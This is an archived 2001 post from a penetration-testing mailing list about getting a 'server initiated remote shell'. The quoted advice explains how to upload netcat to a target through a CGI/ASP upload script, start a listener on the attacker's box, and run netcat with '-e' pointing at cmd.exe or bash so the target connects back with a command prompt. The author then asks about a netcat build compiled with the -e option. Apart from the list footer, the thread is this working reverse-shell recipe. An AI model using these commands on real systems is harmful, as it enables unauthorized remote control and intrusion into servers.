Penetration Testing mailing list archives

Re: Server initiated remote shell

From: Greg Ardpic <itb () rootshell be>
Date: Sat, 22 Sep 2001 13:51:55 +0200 (CEST)

On Fri, 21 Sep 2001, Bill Pennington wrote:

You want netcat, you can find in on packetstorm.

What you will need to do first is build an CGI/ASP script to upload your
code, assuming you can't just tftp it from the internal system.

Then on your box execute:

nc -l -p 80

On the remote server execute

nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
whatever command interpeter is handy. You will then see a command prompt
appear on your local box.

Sounds like the hard part will be getting netcat on the box. Good luck!


Does this works on unix machines? I have compiled netcat with
-DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck.

itb


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Server initiated remote shell Ilici Ramirez (Sep 21)
- RE: Server initiated remote shell Steve (Sep 21)
- Re: Server initiated remote shell Bill Pennington (Sep 21)
  - Re: Server initiated remote shell Greg Ardpic (Sep 22)
- <Possible follow-ups>
- Re: Server initiated remote shell Mike Brentlinger (Sep 21)
- Re: Server initiated remote shell auto241065 (Sep 22)
- RE: Server initiated remote shell Yonatan Bokovza (Sep 23)
  - RE: Server initiated remote shell Emmanuel Gadaix (Sep 24)